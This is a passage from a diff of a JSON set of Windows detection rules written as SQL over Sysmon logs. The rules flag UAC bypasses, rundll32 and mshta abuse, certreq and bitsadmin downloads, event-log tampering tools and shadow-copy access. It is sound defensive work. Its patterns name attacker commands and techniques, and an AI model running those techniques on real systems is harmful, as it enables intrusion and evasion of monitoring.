ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE 